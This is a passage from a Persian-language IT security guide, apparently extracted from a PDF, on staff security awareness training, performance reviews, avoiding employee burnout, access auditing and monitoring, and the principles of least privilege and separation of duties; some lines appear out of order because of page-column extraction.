ﺍﻣﻨﻴﺖ ﻭ ﺍﺳﺘﻔﺎﺩﺓ ﺻﺤﻴﺢ ﺍﺯ ﺭﺍﻳﺎﻧﻪ ﺩﺭﻳﺎﻓﺖ ﻛﻨﻨﺪ .ﺍﻳﻦ ﺑـﺎﺯﺁﻣﻮﺯﻱ
ﺑﺮﺍﻱ ﻛﺎﺭﺑﺮﺍﻥ ﻓﺮﺻﺖ ﻣﻨﺎﺳـﺒﻲ ﺟﻬـﺖ ﻳـﺎﺩﺁﻭﺭﻱ ﺗﻬﺪﻳـﺪﻫـﺎﻱ
ﻣﻮﺟــﻮﺩ ﻭ ﭘﻴﺎﻣــﺪﻫﺎﻱ ﺁﻧﻬــﺎ ﺑﻮﺟــﻮﺩ ﻣــﻲﺁﻭﺭﺩ ﻭ ﻳــﻚ ﻓــﻀﺎﻱ
ﻣﺒﺎﺣﺜﻪﺍﻱ ﺑﺮﺍﻱ ﺗﺒﺎﺩﻝ ﻧﻈﺮ ﻭ ﺩﺭ ﻣﻴﺎﻥ ﮔﺬﺍﺷﺘﻦ ﻧﮕﺮﺍﻧﻴﻬﺎ ﺍﻳﺠـﺎﺩ
ﻣﻲﻛﻨﺪ.
ﻻﺯﻡ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﻓﺮﺻـﺖ ﻣﻨﺎﺳـﺒﻲ ﺑـﺮﺍﻱ ﺁﻣﻮﺯﺷـﻬﺎﻱ
ﺟﺎﺭﻱ ﻭ ﺁﺗﻲ ﺑﺪﻫﻴﺪ؛ ﻣﺜﻞ ﺗﺸﻮﻳﻖ ﺑـﻪ ﺣـﻀﻮﺭ ﺩﺭ ﻛﻨﻔﺮﺍﻧـﺴﻬﺎ ﻭ
ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﺣﺮﻓﻪﺍﻱ ،ﺍﺷﺘﺮﺍﻙ ﺩﺭ ﻧﺸﺮﻳﻪﻫﺎﻱ ﺍﺩﻭﺍﺭﻱ ﺣﺮﻓـﻪﺍﻱ
ﻭ ﺗﺠﺎﺭﻱ ،ﻭ ﺩﺳﺘﻴﺎﺑﻲ ﺑﻪ ﻛﺘﺎﺑﻬﺎﻱ ﻣﺮﺟﻊ ﻭ ﺳﺎﻳﺮ ﻣﻮﺍﺭﺩ ﺁﻣﻮﺯﺷﻲ.
ﺑﺎﻳــﺪ ﺑــﻪ ﻛﺎﺭﻣﻨــﺪﺍﻥ ﺯﻣــﺎﻥ ﻛــﺎﻓﻲ ﺑــﺮﺍﻱ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﻛﺘــﺐ ﻭ
ﺍﻧﮕﻴﺰﻩﻫﺎﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﻳﺎﺩﮔﻴﺮﻱ ﻣﻬﺎﺭﺗﻬﺎﻱ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺩﺍﺩﻩ ﺷﻮﺩ.
ﺩﺭ ﻛﻨﺎﺭ ﺁﻣﻮﺯﺵ ﺩﻭﺭﻩ ﺍﻱ ﻣﻤﻜﻦ ﺍﺳﺖ ﻣﺎﻳﻞ ﺑﺎﺷﻴﺪ ﺍﺯ ﺭﻭﺷـﻬﺎﻱ
ﻼ ﻧـﺼﺐ
ﻣﺘﻨﻮﻉﺗﺮﻱ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﺍﻳﻦ ﺭﻭﻧﺪ ﺑﻬـﺮﻩ ﮔﻴﺮﻳـﺪ -ﻣـﺜ ﹰ
ﭘﻮﺳﺘﺮﻫﺎ ﻳﺎ ﺍﻋﻼﻣﻴﻪﻫﺎﻳﻲ ﺩﺭ ﻣﻮﺭﺩ ﺍﻟﮕﻮﻫـﺎﻱ ﺳـﺮﺁﻣﺪﻱ ،ﺍﻋـﻼﻡ
ﺷﻌﺎﺭﻫﺎﻱ ﺭﻭﺯﺍﻧﻪ ﻭ ﻫﻔﺘﮕﻲ ،ﻧﺎﻣﮕﺬﺍﺭﻱ ﻳﻚ ﺭﻭﺯ ﺑﻪ ﻋﻨـﻮﺍﻥ "ﺭﻭﺯ
ﺑﺨﺶ ﺳﻮﻡ
ﺑﺮﺭﺳﻴﻬﺎﻱ ﻣﺠﺪﺩ ﻭ ﺩﻭﺭﻩﺍﻱ
ﺍﻃﻼﻋﺎﺕ ﭘـﺸﺖ ﺗﻠﻔـﻦ ﺑﺎﺷـﺪ .ﻣﻘﺎﻣـﺎﺕ ﺍﺟﺮﺍﻳـﻲ ﻧﺒﺎﻳـﺪ ﺑـﺪﻟﻴﻞ
ﻣﻮﻗﻌﻴﺘﺸﺎﻥ ﺍﺯ ﺍﻳﻦ ﻣﻮﺍﺭﺩ ﻣﺴﺘﺜﻨﻲ ﺷـﻮﻧﺪ -ﺁﻧﻬـﺎ ﻫـﻢ ﺍﮔـﺮ ﻧـﻪ
ﺑﻴﺸﺘﺮ ،ﺣﺪﺍﻗﻞ ﺑﻪ ﺍﻧﺪﺍﺯﺓ ﻛﺎﺭﻛﻨﺎﻥ ﺩﻳﮕﺮ ﺩﺭ ﻣﻌﺮﺽ ﺍﻧﺘﺨﺎﺏ ﺭﻣـﺰ
ﻋﺒﻮﺭ ﺿﻌﻴﻒ ﻭ ﺳﺎﻳﺮ ﺍﺷﺘﺒﺎﻫﺎﺕ ﻫﺴﺘﻨﺪ .ﺁﻧﻬﺎ ﻧﻴﺰ ﺑﺎﻳـﺪ ﭘﺎﻳﺒﻨـﺪﻱ
ﺧﻮﺩ ﺑﻪ ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺭﺍ ﻧﺸﺎﻥ ﺩﻫﻨﺪ ،ﭼﺮﺍﻛﻪ ﺁﮔﺎﻫﻲ ﺍﻣﻨﻴﺘـﻲ ﺩﺭ
ﺳﺎﺯﻣﺎﻧﻬﺎ ﺍﺯ ﺑﺎﻻ ﺑﻪ ﭘﺎﺋﻴﻦ ﺟﺮﻳﺎﻥ ﻣﻲﻳﺎﺑﺪ ﻭ ﻧﻪ ﺑﺎﻟﻌﻜﺲ.
١٦٢
ﺍﻣﻨﻴﺖ" ،ﻭ ﻳﺎ ﺑﺮﮔﺰﺍﺭﻱ ﻧﺸﺴﺘﻬﺎ ﻭ ﺳﻤﻴﻨﺎﺭﻫﺎﻱ ﻣﺨﺘﻠﻒ ﺑﻪ ﻣﻨﻈﻮﺭ
ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻛﻤﺮﻧﮓ ﺷﺪﻥ ﺍﻫﻤﻴﺖ ﻣﻮﺿـﻮ ﹺﻉ ﺍﻣﻨﻴـﺖ ﺩﺭ ﻣﻨﻈـﺮ
ﻋﻤﻮﻣﻲ.
ﺍﻟﺒﺘﻪ ﺍﻧﺪﺍﺯﻩ ﻭ ﻃﺒﻴﻌﺖ ﺳـﺎﺯﻣﺎﻥ ،ﺳـﻄﺢ ﺗﻬﺪﻳـﺪﺍﺕ ﻭ ﺿـﺮﺭﻫﺎﻱ
ﺍﺣﺘﻤﺎﻟﻲ ،ﻭ ﻧﻬﺎﻳﺘﹰﺎ ﺗﻌﺪﺍﺩ ﻭ ﺭﻓﺘﺎﺭ ﻛﺎﺭﻛﻨﺎﻥ ﻫﻤﻪ ﻭ ﻫﻤﻪ ﺍﺯ ﻣﻮﺍﺭﺩﻱ
ﻫﺴﺘﻨﺪ ﻛﻪ ﻫﻨﮕﺎﻡ ﺗﻨﻈﻴﻢ ﻃﺮﺣﻬـﺎ ﺑﺎﻳـﺪ ﺩﺭﻧﻈـﺮ ﮔﺮﻓﺘـﻪ ﺷـﻮﻧﺪ.
ﻫﺰﻳﻨﻪﻫﺎﻱ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﮔﺎﻫﻲﺑﺨـﺶ ﻧﻴـﺰ ﺑﺎﻳـﺪ ﺍﺯ ﻗﺒـﻞ ﺩﺭﻧﻈـﺮ
ﮔﺮﻓﺘﻪ ﻭ ﺩﺭ ﺑﻮﺩﺟﺔ ﺳﺎﺯﻣﺎﻥ ﺁﻣﺪﻩ ﺑﺎﺷﻨﺪ.
ﺑﺮﺭﺳﻲ ﻭ ﻛﻨﺘﺮﻝ ﻛﺎﺭﺁﻳﻲ
ﻛﺎﺭﺁﻳﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺷﻤﺎ ﺑﺎﻳﺪ ﺑﺼﻮﺭﺕ ﺩﻭﺭﻩﺍﻱ ﺑﺮﺭﺳﻲ ﺷﻮﺩ .ﺑﻄﻮﺭ
ﺧﺎﺹ ،ﺩﺭ ﻗﺒﺎﻝ ﺭﺷﺪ ﺣﺮﻓﻪ ﺍﻱ ﻭ ﻋﻤﻠﻜﺮﺩﻫﺎﻱ ﻣﻮﻓـﻖ ﺑﺎﻳـﺪ ﺑـﻪ
ﻛﺎﺭﻣﻨﺪﺍﻥ ﺍﻣﺘﻴﺎﺯ ﻭ ﭘﺎﺩﺍﺵ ﺗﻌﻠﻖ ﺑﮕﻴﺮﺩ .ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﻣـﺸﻜﻼﺕ
ﺑﺎﻳﺪ ﺑﺼﻮﺭﺗﻲ ﺳﺎﺯﻧﺪﻩ ﺷﻨﺎﺳﺎﻳﻲ ﻭ ﺣﻞ ﺷﻮﻧﺪ .ﺷﻤﺎ ﺑﺎﻳﺪ ﻛﺎﺭﻣﻨﺪﺍﻥ
ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺍﻓﺰﺍﻳﺶ ﺗﻮﺍﻧﺎﻳﻴﻬﺎ ﻭ ﺩﺭﻙ ﺑﻴﺸﺘﺮ ﺗﺸﻮﻳﻖ ﻛﻨﻴﺪ.
ﺷـﻤﺎ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ ﺍﺯ ﺑﻮﺟــﻮﺩ ﺁﻣـﺪﻥ ﺷـﺮﺍﻳﻄﻲ ﻛـﻪ ﺩﺭ ﺁﻧﻬــﺎ
ﻛﺎﺭﻛﻨﺎﻥ ﺍﺣﺴﺎﺳﻬﺎﻱ ﻣﺨﺮﺑﻲ ﭼﻮﻥ ﺧﺴﺘﮕﻲ ﻣﻔﺮﻁ ﺍﺯ ﻛﺎﺭ ﺯﻳـﺎﺩ،
ﺑﻲﺍﺣﺘﺮﺍﻣﻲ ،ﻭ ﻳﺎ ﺑﻲﺗﻮﺟﻬﻲ ﭘﻴﺪﺍ ﻣـﻲﻛﻨﻨـﺪ ﺟﻠـﻮﮔﻴﺮﻱ ﻧﻤﺎﻳﻴـﺪ.
ﺑﻮﺟﻮﺩ ﺁﻣﺪﻥ ﭼﻨﻴﻦ ﻣﺤﻴﻄﻲ ﺩﺭ ﺍﺩﺍﺭﻩ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﻣﻨﺠـﺮ ﺑـﻪ
ﺑﻲﺗﻮﺟﻬﻲ ﻛﺎﺭﻛﻨﺎﻥ ﺑﻪ ﻣﻨﺎﻓﻊ ﺳﺎﺯﻣﺎﻥ ﺷـﻮﺩ .ﻫﻤﭽﻨـﻴﻦ ﻣﻤﻜـﻦ
ﺍﺳﺖ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻦ ﺩﺭ ﻓﺮﺻﺘﻬﺎﻱ ﻣﻨﺎﺳـﺒﺘﺮ ﺷـﻐﻠﻲ
ﺳﺎﺯﻣﺎﻥ ﺷﻤﺎ ﺭﺍ ﺗﺮﻙ ﻛﻨﻨﺪ؛ ﻳﺎ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ﻣﻤﻜـﻦ ﺍﺳـﺖ ﺑـﺮﺍﻱ
ﺍﻧﺘﻘﺎﻣﮕﻴﺮﻱ ﺩﺭ ﺑﻌﻀﻲ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺁﺷﻮﺑﮕﺮﺍﻧﻪ ﻋﻠﻴﻪ ﺷﻤﺎ ﻫﻤﻜﺎﺭﻱ
ﻧﻤﺎﻳﻨﺪ .ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑﺎﻳﺪ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺍﺳﺘﺜﻨﺎ -ﻭ ﻧﻪ ﻳﻚ ﺭﻭﺍﻝ -
ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺗﻤﺎﻡ ﻛﺎﺭﻣﻨﺪﺍﻥ -ﺧﺼﻮﺻﹰﺎ ﺁﻧﻬـﺎﻳﻲ ﻛـﻪ ﺩﺭ ﭘـﺴﺘﻬﺎﻱ
ﺣﺴﺎﺱ ﻫﺴﺘﻨﺪ -ﺑﺎﻳﺪ ﺗﻌﻄﻴﻼﺕ ﻭ ﺍﻭﻗـﺎﺕ ﻓﺮﺍﻏـﺖ ﻛـﺎﻓﻲ ﺩﺍﺩﻩ
ﺷﻮﺩ .ﺍﺿﺎﻓﻪﻛﺎﺭﻱ ﺑـﻪ ﺷـﺪﺕ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺭﺍ ﺧـﺴﺘﻪ ﻣـﻲ ﻛﻨـﺪ ﻭ
ﺧﺴﺘﮕﻲ ﻧﻴﺰ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﻛﻪ ﺿﺮﻳﺐ ﺧﻄـﺎﻱ ﺁﻧﻬـﺎ ﺑـﺎﻻ ﺭﻭﺩ،
ﻣﺘﻮﺟﻪ ﺍﺷﻜﺎﻻﺕ ﻧﺸﻮﻧﺪ ﻳﺎ ﺍﺯ ﺁﻧﻬﺎ ﭼﺸﻢﭘﻮﺷﻲ ﻛﻨﻨﺪ ،ﻭ ﻫﻤﭽﻨﻴﻦ
ﺍﺯ ﻧﻈﺮ ﻋﺎﻃﻔﻲ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ .ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺩﺭ ﺯﻧﺪﮔﻲ ﺧﺼﻮﺻﻲ
ﺁﻧﻬﺎ ﻧﻴﺰ ﻓﺸﺎﺭﻫﺎﻱ ﻋﺼﺒﻲ ﺑﻮﺟﻮﺩ ﺧﻮﺍﻫﺪ ﺁﻣﺪ ،ﭼﺮﺍﻛﻪ ﺧﺎﻧﻮﺍﺩﻩﻫـﺎ
ﻭ ﻋﺰﻳﺰﺍﻧﺸﺎﻥ ﻫﻢ ﻣﻲﺧﻮﺍﻫﻨﺪ ﮔﻬﮕﺎﻩ ﺩﺭ ﻃﻮﻝ ﺭﻭﺯ ﺁﻧﻬﺎ ﺭﺍ ﺑﺒﻴﻨﻨﺪ.
ﺑﺮﺍﻱ ﻛﺎﺭﻣﻨﺪﺍﻧﻲ ﻛﻪ ﺑﻴﺶ ﺍﺯ ﺍﻧﺪﺍﺯﻩ ﺗﺤﺖ ﻓﺸﺎﺭ ﻭ ﺧـﺴﺘﻪ ﺑﺎﺷـﻨﺪ
ﺍﺣﺘﻤﺎﻝ ﺑﻴﺸﺘﺮﻱ ﻭﺟـﻮﺩ ﺩﺍﺭﺩ ﻛـﻪ ﺁﺯﺭﺩﻩﺧـﺎﻃﺮ ﺷـﻮﻧﺪ ﻭ ﺑـﺪﻳﻬﻲ
ﺍﺳﺖ ﻛﻪ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺩﺭ ﺑﻬﺒﻮﺩ ﺍﻣﻨﻴﺖ ﻫﻴﭻ ﻛﻤﻜﻲ ﻧﺨﻮﺍﻫﺪ ﻛﺮﺩ.
ﺑﻄﻮﺭ ﻛﻠﻲ ﻋﻼﺋﻢ ﻓﺸﺎﺭﻫﺎﻱ ﺭﻭﺍﻧـﻲ ﺯﻳـﺎﺩ ،ﻣـﺴﺎﺋﻞ ﺷﺨـﺼﻲ ﻭ
ﺳﺎﻳﺮ ﺍﻧﻮﺍﻉ ﻣﺸﻜﻼﺕ ﻛﺎﺭﻛﻨﺎﻧﻲ ﻛﻪ ﺍﺯ ﺍﻣﺘﻴﺎﺯﺍﺕ ﺩﺳﺘﺮﺳﻲ ﻧـﺴﺒﺘﹰﺎ
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺑﺎﻻ ﺑﺮﺧﻮﺭﺩﺍﺭﻧﺪ ﺭﺍ ﺑﺎﻳﺪ ﻛﻨﺘﺮﻝ ﻛﺮﺩ .ﺗﺸﺨﻴﺺ ﺍﻳﻦ ﻣـﺸﻜﻼﺕ ﻭ
ﻞ ﺍﻧـﺴﺎﻧﻴﺖ ﺍﺳـﺖ.
ﺩﺭﺻﻮﺭﺕ ﺍﻣﻜﺎﻥ ﻛﻤﻚ ﺑﻪ ﺭﻓﻊ ﺁﻧﻬـﺎ ﺣـﺪﺍﻗ ﹺ
ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺭﺍﻫﻲ ﺑﺮﺍﻱ ﺣﻔﺎﻇﺖ ﺍﺯ ﻣﻨـﺎﺑﻊ ﭘـﺮ ﺍﺭﺯﺵ
ﺳﺎﺯﻣﺎﻥ -ﺧﻮﺩ ﻛﺎﺭﻛﻨﺎﻥ ﻭ ﻧﻴﺰ ﻣﻨﺎﺑﻌﻲ ﻛـﻪ ﺑـﻪ ﺁﻧﻬـﺎ ﺩﺳﺘﺮﺳـﻲ
ﺩﺍﺭﻧﺪ -ﻣﻲﺑﺎﺷﺪ.
ﺑﺎﺯﺑﻴﻨﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ
ﻲ ﺩﺳﺘﺮﺳﻴﻬﺎ ﺑـﻪ ﺍﺑـﺰﺍﺭ ﻭ
ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ ﻛﻪ ﺍﻣﻜﺎﻥ ﺑﺎﺯﺑﻴﻨ ﹺ
ﺍﻃﻼﻋﺎﺕ ﻭﺟﻮﺩ ﺩﺍﺭﺩ .ﻋﻼﻭﻩ ﺑﺮ ﺍﻳﻦ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻫﺮﻛﺲ ﻛـﻪ
ﺍﺯ ﻫﺮ ﻧﻮﻉ ﺩﺳﺘﺮﺳﻲ ﺑﺮﺧﻮﺭﺩﺍﺭ ﺍﺳﺖ ﺍﺯ ﻭﺟـﻮﺩ ﺍﻳـﻦ ﺑـﺎﺯﺑﻴﻨﻲﻫـﺎ
ﺍﻃﻼﻉ ﺩﺍﺭﺩ .ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﻮﺍﺭﺩ ﺳﻮﺀ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑـﻪ ﺍﻳـﻦ
ﺩﻟﻴﻞ ﺻﻮﺭﺕ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﻧﻔـﻮﺫﮔﺮ ﺍﺣـﺴﺎﺱ ﻣـﻲﻛﻨـﺪ ﻛـﺴﻲ
ﻣﺘﻮﺟﻪ ﻛﺎﺭﻫﺎﻱ ﺍﻭ ﻧﺨﻮﺍﻫﺪ ﺷـﺪ .ﺍﮔـﺮ ﻳـﻚ ﺗﺒﻬﻜـﺎﺭ ﺑﺪﺍﻧـﺪ ﻛـﻪ
ﻓﻌﺎﻟﻴﺘﻬﺎﻳﺶ ﺑﻪ ﺛﺒﺖ ﻣﻲﺭﺳﺪ ﻣﻤﻜﻦ ﺍﺯ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫـﺎﻱ ﻣﺨـﺮﺏ
ﺧﻮﺩ ﺻﺮﻓﻨﻈﺮ ﻛﻨﺪ .ﻣﻨﻈـﻮﺭ ﺍﺯ ﺑـﺎﺯﺑﻴﻨﻲ ﺗﻨﻬـﺎ ﺑـﺎﺯﺑﻴﻨﻲ ﺛﺒﺘﻬـﺎﻱ
ﺭﺍﻳﺎﻧــﻪﺍﻱ ﻧﻴــﺴﺖ؛ ﺑﻠﻜــﻪ ﮔﺰﺍﺭﺷــﺎﺕ ﻭﺭﻭﺩ ﻭ ﺧــﺮﻭﺝ ﺍﻓــﺮﺍﺩ ﺍﺯ
ﺳﺎﺧﺘﻤﺎﻥ ،ﺳـﻮﺍﺑﻖ ﺍﺳـﺘﻔﺎﺩﺓ ﺍﻓـﺮﺍﺩ ﺍﺯ ﻗﻔﻠﻬـﺎﻱ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ ،ﻭ
ﻫﻤﭽﻨﻴﻦ ﻧﻮﺍﺭﻫﺎﻱ ﺗﻠﻮﻳﺰﻳﻮﻥ ﻣﺪﺍﺭ ﺑﺴﺘﻪ ،ﻫﻤﮕﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﻮﺭﺩ
ﺑﺎﺯﺑﻴﻨﻲ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ ﺗﺎ ﺯﻣﻴﻨﻪ ﺑﺮﺍﻱ ﻣﺴﺌﻮﻟﻴﺖﭘﺬﻳﺮﻱ ﺑﻴﺸﺘﺮ ﻣﻬﻴـﺎ
ﺷﻮﺩ.
ﺑﺎ ﺗﻤﺎﻡ ﺍﻳﻦ ﺍﺣﻮﺍﻝ ﺑﺎﻳﺪ ﻣﺮﺍﻗﺐ ﺁﺛﺎﺭ ﻛﻨﺘﺮﻟﻬـﺎ ﭘﻨﻬـﺎﻧﻲ ﻫـﻢ ﺑـﻮﺩ.
ﺍﻓﺮﺍﺩ ﺍﺯ ﺍﻳﻨﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﺍﻋﺘﻤﺎﺩ ﻧﺸﻮﺩ ﻭ ﺑﻄﻮﺭ ﻣﺨﻔﻴﺎﻧﻪ ﺗﺤﺖ ﻧﻈـﺮ
ﺑﺎﺷﻨﺪ ﺍﺣﺴﺎﺱ ﻧﺎﺧﺮﺳﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ؛ ﻭ ﺍﮔﺮ ﺑﻔﻬﻤﻨـﺪ ﻛـﻪ ﺗﺤـﺖ
ﻧﻈﺮ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻋﺼﺒﺎﻧﻲ ﺷﻮﻧﺪ ﻭ ﺣﺘـﻲ ﻋﻤﻠﻜـﺮﺩﻱ
ﺍﻓﺮﺍﻃﻲ ﺍﺯ ﺧﻮﺩ ﺑﺮﻭﺯ ﺩﻫﻨﺪ .ﺑﻌﻨﻮﺍﻥ ﻣﺜﺎﻝ ﺩﺭ ﺑﻌﻀﻲ ﺍﺯ ﺩﺍﺩﺳـﺮﺍﻫﺎ
ﺩﻳﺪﻩﺷﺪﻩ ﻛﻪ ﻗـﺎﻧﻮﻥ ﻛـﺎﺭ ﻭ ﻗﺮﺍﺭﺩﺍﺩﻫـﺎﻱ ﺍﺳـﺘﺨﺪﺍﻣﻲ ﺗﻮﺍﻧـﺴﺘﻪ
ﺑﺎﻋﺚ ﺭﻭﺑﺮﻭ ﺷﺪﻥ ﻛﺎﺭﻓﺮﻣﺎ ﺑﺎ ﺩﺍﺩﺭﺳﻴﻬﺎﻱ ﺳﻨﮕﻴﻦ ﻣﺪﻧﻲ ﺷﻮﺩ.
ﺍﮔﺮ ﻧﻈﺎﺭﺕ ﺑﺴﻴﺎﺭ ﺩﻗﻴﻖ ﺑﺎﺷﺪ ﺻﺮﻑ ﻣﻄﻠﻊ ﻛـﺮﺩﻥ ﻛﺎﺭﻣﻨـﺪﺍﻥ ﺍﺯ
ﺍﻳﻨﻜﻪ ﺗﺤﺖ ﻧﻈﺮ ﻫﺴﺘﻨﺪ ﻛﺎﻓﻲ ﻧﻴﺴﺖ .ﺑﻌﻀﻲ ﻣﻄﺎﻟﻌـﺎﺕ ﻧـﺸﺎﻥ
ﺩﺍﺩﻩ ﻛﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ ﻭﻗﺘﻲ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺷﺪﻳﺪ ﻗﺮﺍﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷـﻨﺪ
ﻼ ﺍﮔﺮ ﺷﻤﺎ
ﻛﺎﺭﺍﻳﻲ ﻛﻤﺘﺮ ﻭ ﺭﻓﺘﺎﺭ ﻧﺎﻣﻨﺎﺳﺒﺘﺮﻱ ﺧﻮﺍﻫﻨﺪ ﺩﺍﺷﺖ .ﻣﺜ ﹰ
ﺑﺨﻮﺍﻫﻴﺪ ﺯﻣﺎﻥ ﻣﻜﺎﻟﻤﺔ ﺗﻠﻔﻨﻲ ﻛﺎﺭﻛﻨﺎﻥ ،ﻫﺮ ﭘﺎﻳﮕﺎﻩ ﻭﺏ ﻛﻪ ﺍﺯ ﺁﻥ
ﺑﺎﺯﺩﻳﺪ ﻣﻲﻛﻨﻨﺪ ،ﻭ ﻳﺎ ﺍﻳﻨﻜﻪ ﻫﺮ ﭼﻨﺪ ﻭﻗﺖ ﻳﻜﺒـﺎﺭ ﺑـﻪ ﺍﺳـﺘﺮﺍﺣﺖ
ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﺭﺍ ﺗﺤﺖ ﻧﻈﺎﺭﺕ ﺧﻮﺩ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ،ﺁﻧﮕﺎﻩ ﺍﻳﻦ ﻣﺴﺌﻠﻪ
ﻼ ﺻﺤﺖ ﺧﻮﺍﻫﺪ ﺩﺍﺷﺖ .ﺑﻬﺘﺮﻳﻦ ﺳﻴﺎﺳﺘﻬﺎ ﺁﻧﻬـﺎﻳﻲ ﻫـﺴﺘﻨﺪ
ﻛﺎﻣ ﹰ
ﻛﻪ ﺑﺎ ﻧﻈﺮ ﻣﺴﺎﻋﺪ ﻭ ﺗﺸﺮﻳﻚ ﻣﺴﺎﻋﻲ ﻛﺎﺭﻣﻨﺪﺍﻥ ﺗﺪﻭﻳﻦ ﺷـﻮﻧﺪ ﻭ
ﻛﺎﺭﻛﻨﺎﻥ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﺍﻧﺴﺎﻧﻲ ﻫﻢ )ﺍﮔﺮ ﭼﻨﻴﻦ ﺑﺨﺸﻲ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ(
ﻫﻨﮕﺎﻡ ﺗﺪﻭﻳﻦ ﺁﻥ ﺣﻀﻮﺭ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ.
١٦٣
ﺑﺨﺶ ﺳﻮﻡ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺳﺎﺯﻣﺎﻧﻬﺎ
ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ
ﺍﺻﻮﻝ ﺩﺳﺘﺮﺳﻲ ﺣﺪﺍﻗﻠﻲ ﻭ ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ ﺭﺍ ﺑﻪ ﺩﻗـﺖ ﺩﺭﻧﻈـﺮ
ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﻳﻦ ﺍﺻﻮﻝ ﺩﺭ ﻃﻮﻝ ﺯﻣﺎﻥ ﻛـﺎﺭﺁﻳﻲ ﺧـﻮﺩ ﺭﺍ ﺛﺎﺑـﺖ
ﻛﺮﺩﻩﺍﻧﺪ ﻭ ﻫﺮﮔﺎﻩ ﺩﺭ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﻗﺎﺑﻞ ﺍﺟﺮﺍ ﺑﺎﺷـﻨﺪ ﺑﺎﻳـﺪ ﻣـﻮﺭﺩ
ﺍﺳﺘﻔﺎﺩﻩ ﻗﺮﺍﺭ ﮔﻴﺮﻧﺪ.
ﺣﺪﺍﻗﻞ ﺩﺳﺘﺮﺳﻲ
ﺗﻔﻜﻴﻚ ﻭﻇﺎﻳﻒ
ﺍﻳﻦ ﺍﺻﻞ ﺑﺮ ﺍﻳﻦ ﻣﺒﻨﺎ ﺍﺳـﺘﻮﺍﺭ ﺍﺳـﺖ ﻛـﻪ ﺷـﻤﺎ ﺑﺎﻳـﺪ ﺑـﺎ ﺩﻗـﺖ
ﻭﻇــﺎﻳﻒ ﺍﻓــﺮﺍﺩ ﺭﺍ ﺍﺯ ﻫــﻢ ﺟــﺪﺍ ﻛﻨﻴـﺪ .ﺩﺭ ﺍﻳﻨــﺼﻮﺭﺕ ﻛــﺴﺎﻧﻴﻜﻪ
ﻋﻬﺪﻩﺩﺍﺭ ﻧﻈﺎﺭﺕ ﺑﺮ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻫﺴﺘﻨﺪ ﺧﻮﺩ ﻫﻢ ﻧﺨﻮﺍﻫﻨـﺪ
ﺗﻮﺍﻧﺴﺖ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎ ﺍﺳﺘﻔﺎﺩﺓ ﻧﺎﺩﺭﺳﺖ ﻛﻨﻨـﺪ .ﺑﻨـﺎﺑﺮﺍﻳﻦ ﻭﺍﮔـﺬﺍﺭ
ﻛﺮﺩﻥ ﻫﻤﺔ ﻓﻌﺎﻟﻴﺘﻬﺎﻱ ﺍﻣﻨﻴـﺘﻲ ﻭ ﻣﺴﺌﻮﻟﻴﺘﻬﺎﻱ ﻧﻈﺎﺭﺗﻲ ﺑﻪ ﺗﻨﻬـﺎ
